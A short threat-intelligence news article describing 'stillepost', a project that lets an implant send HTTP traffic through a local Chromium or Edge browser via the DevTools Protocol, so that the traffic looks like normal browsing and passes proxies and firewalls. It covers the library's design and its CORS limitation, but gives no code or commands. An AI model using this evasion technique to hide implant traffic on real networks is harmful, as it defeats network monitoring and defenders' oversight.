Covert Channels: Stillepost Turns Chromium Browser into Stealth Application-Layer Proxy
A project called stillepost demonstrates an unusual technique that turns an ordinary Chromium-based browser into an application-layer proxy for HTTP traffic. The idea is that the “implant” never connects to the internet directly; instead, it communicates with a locally running Chromium instance and, via the Chrome DevTools Protocol, compels the browser to issue the required HTTP requests on its behalf. To the outside world, this activity appears indistinguishable from normal browser behavior, while all proxy settings, authentication, and PAC logic are automatically inherited from the browser profile—one that is typically already permitted by network policies and firewalls.
In the repository, the technique is packaged as a small library named stillepost, which exposes three core functions: environment initialization, execution of an HTTP request through the browser, and graceful shutdown with proper resource cleanup. JSON parsing is handled through the bundled cJSON dependency, avoiding any external installation requirements. As a demonstration, the author provides a ready-made C client that sends a POST request via Edge, along with a minimal Python test server to observe the “browser-originated” requests during development. The original Python prototype used to validate the concept has also been preserved.
The approach, however, comes with a significant limitation: it works only when the target web server permits CORS requests from arbitrary origins. In testing, the author relied on a server that explicitly set Access-Control-Allow-Origin: * and allowed the necessary methods and headers, ensuring that the browser would not block the request. If the destination does not allow CORS, the browser itself will halt the request, and traffic cannot be transparently dispatched within the user’s context.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
